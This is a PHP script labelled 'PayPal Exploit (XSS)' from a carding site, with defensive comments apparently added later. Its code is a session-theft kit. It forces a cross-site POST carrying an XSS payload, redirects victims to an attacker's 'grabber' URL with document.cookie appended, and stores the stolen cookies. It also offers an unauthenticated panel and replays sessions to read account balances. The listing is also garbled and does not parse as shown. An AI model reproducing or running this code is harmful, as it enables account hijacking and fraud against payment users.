<?php /*
Website: http://carderx.com
PayPal Exploit (XSS)
Coded by: mainl00p
*/
// Configuration constants used by the functions below.
//   PPLOGIN_URL - page that check() requests with a stored cookie string.
//   PPXSS_URL   - search endpoint whose query string already carries markup
//                 (an <iframe onload=...> probe). The header comment labels
//                 the issue as XSS; which parameter is reflected cannot be
//                 confirmed from this listing.
//   COOKIE_FILE - local file that getCookie() appends to and readCookies() reads.
//   EXPLOIT_URL - receiver URL placed in the redirect built by the main section.
// Remediation for this bug class on the affected endpoint: context-aware output
// encoding of every reflected request parameter, plus a Content-Security-Policy
// that disallows inline event handlers and inline script.
// NOTE(review): the listing appears damaged by page rendering and does not
// parse as PHP in the form shown here.
define("PPLOGIN_URL", "https://www.paypal.com/en");
define("PPXSS_URL", "https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name="/>'&q="&search_cat=®ion="><iframe onload=alert(0)/>");
define("COOKIE_FILE", "carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES)
define("EXPLOIT_URL", "http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL
// doXSS($Vector): prints an HTML form of hidden fields whose action is
// PPXSS_URL and whose method is POST, puts $Vector into the "load" field, and
// prints a script that submits the form as soon as the page is rendered.
// The request is therefore issued by the visitor's browser, not by this server.
// Detection: on the receiving site this shows up as a cross-site POST to the
// search endpoint with a foreign Origin/Referer and markup characters in the
// "load" field or the query string.
// Mitigation: output-encode reflected parameters; SameSite cookie attributes
// keep session cookies off cross-site POSTs of this kind.
// I put automatically those fields (_t must be there, it can have random value, I preferred NULL) function doXSS($Vector)
{ echo "<form id="sui_m" name="sui_m" method="post" class="" action="" . PPXSS_URL . "">
<input type="hidden" name="_t" value=""/>
<input type="hidden" name="_fl" value="1" />
<input type="hidden" name="atoi" value="0" />
<input type="hidden" name="min" value="0" />
<input type="hidden" name="max[0]" value="" />
<input type="hidden" name="load" value="$Vector" />
</form>
<script type="text/javascript">document.getElementById("sui_m").su bmit();</script>";
}
// getCookie(): if the request has a "c" query parameter, base64-encodes its
// value and appends it to COOKIE_FILE; does nothing otherwise.
// The value is whatever the redirect built in the main section appended from
// document.cookie. Cookies set with the HttpOnly attribute are not exposed to
// document.cookie and so would not arrive here.
// Forensics: COOKIE_FILE holding base64 text, and web-log entries with a long
// "c=" query string, are the artifacts this function leaves behind.
function getCookie() {
if (isset($_GET["c"])) {
$f = fopen(COOKIE_FILE, "a");
$c = base64_encode($_GET["c"]);
fwrite($f, $c . "n");
fclose($f);
}
}
// readCookies(): loads the whole of COOKIE_FILE and returns it split into an
// array on the same separator string that getCookie() appends after each entry.
// The entries are returned as stored (base64 text); nothing is decoded here.
function readCookies() {
$c = file_get_contents(COOKIE_FILE);
return explode("n", $c); }
// check($Cookie): requests PPLOGIN_URL with cURL, sending $Cookie as the
// Cookie header, following redirects and verifying the TLS peer, then looks
// for a "Ballance: ...</b>" fragment in the response body.
// Returns the captured text on a match, NULL otherwise.
// This is session replay: a cookie issued to one client is presented from
// another host. Server-side controls that limit it include invalidating
// sessions on logout, short session lifetimes, re-authentication before
// sensitive pages, and alerting when a session token appears from a new
// network or client fingerprint.
function check($Cookie) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, PPLOGIN_URL);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIE, $Cookie);
$s = curl_exec($ch);
if (preg_match("/Ballance: (.*)</b>/i", $s, $z))
return $z[1];
return NULL;
}
// MAIN: request dispatcher with three paths, chosen by query parameters.
//   ?admin=true  - prints every entry returned by readCookies() in an HTML
//                  table with a "Check" link per row, then exits. The only
//                  gate is the query parameter itself, and entries are echoed
//                  without HTML escaping.
//   ?check=VALUE - passes VALUE through check() (nested twice as written) and
//                  prints the result or "Error logging in!", then exits.
//   otherwise    - builds a script string that sets window.location to
//                  EXPLOIT_URL with document.cookie appended as "c", and hands
//                  it to doXSS().
// Incident response: on a host serving this file, look in the access logs for
// requests carrying "admin=true", "check=" or "c=", and for COOKIE_FILE next to
// the script. Because the admin view is unauthenticated, treat anything in
// COOKIE_FILE as exposed to any party that knew the URL.
// Mitigation on the targeted site: HttpOnly session cookies are not readable
// through document.cookie, which is the only source this redirect uses.
if (isset($_GET["admin"]) && $_GET["admin"] == "true") {
$ck = readCookies();
echo "<table style="font-size: 12px;">n";
echo "<tr style="background-color: red; color: white;"><td style="width: 50px;"><b>Id</b></td><td style="width: 700px;"><b>Cookie</b></td><td><b>Check</b></td></tr>n";
$i = 0;
foreach ($ck as $c) {
echo "<tr style="background-color: grey;"><td>" . $i . "</td><td>$c</td><td><a href="?check=" . base64_encode($c) . "">Check</a></td></tr>n";
}
die("");
}
if (isset($_GET["check"]) && $_GET["check"] != "") {
$cz = check(check($_GET["check"]));
if ($cz != NULL) echo "Ballance: " . $cz;
else
echo "Error logging in!";
die("");
}
$XSS = ""><script>window.location=" . EXPLOIT_URL . "?c=" . "" document.cookie;</script>"; doXSS($XSS); ?>
?>